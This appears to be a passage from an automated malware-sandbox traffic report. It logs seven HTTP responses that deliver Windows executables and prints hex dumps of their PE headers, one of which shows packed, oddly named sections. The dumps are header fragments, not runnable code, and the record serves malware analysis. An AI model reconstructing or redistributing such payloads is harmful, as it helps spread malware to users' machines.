Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 26 Jun 2024 06:16:22 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 26 Jun 2024 06:16:23 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 
73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 26 Jun 2024 06:16:23 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 
00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 26 Jun 2024 06:16:24 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 
72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 26 Jun 2024 06:16:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 26 Jun 2024 06:16:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 
00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jun 2024 06:16:30 GMTContent-Type: application/octet-streamContent-Length: 1917952Last-Modified: Wed, 26 Jun 2024 05:57:13 GMTConnection: keep-aliveETag: "667badb9-1d4400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 13 50 4a 58 72 3e 19 58 72 3e 19 58 72 3e 19 03 1a 3d 18 56 72 3e 19 03 1a 3b 18 f8 72 3e 19 8d 1f 3a 18 4a 72 3e 19 8d 1f 3d 18 4e 72 3e 19 8d 1f 3b 18 2d 72 3e 19 03 1a 3a 18 4c 72 3e 19 03 1a 3f 18 4b 72 3e 19 58 72 3f 19 8c 72 3e 19 c3 1c 37 18 59 72 3e 19 c3 1c c1 19 59 72 3e 19 c3 1c 3c 18 59 72 3e 19 52 69 63 68 58 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 57 59 50 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 dc 04 00 00 c4 01 00 00 00 00 00 00 e0 4b 00 00 10 00 00 00 f0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 4c 00 00 04 00 00 32 e8 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 56 80 06 00 6a 00 00 00 00 70 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 cc 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 cc 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 60 06 00 00 10 00 00 00 d8 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 
70 06 00 00 02 00 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 80 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2b 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 63 61 6a 6f 73 64 69 00 30 1a 00 00 a0 31 00 00 30 1a 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 6c 69 76 67 72 77 79 00 10 00 00 00 d0 4b 00 00 04 00 00 00 1e 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 4b 00 00 22 00 00 00 22 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
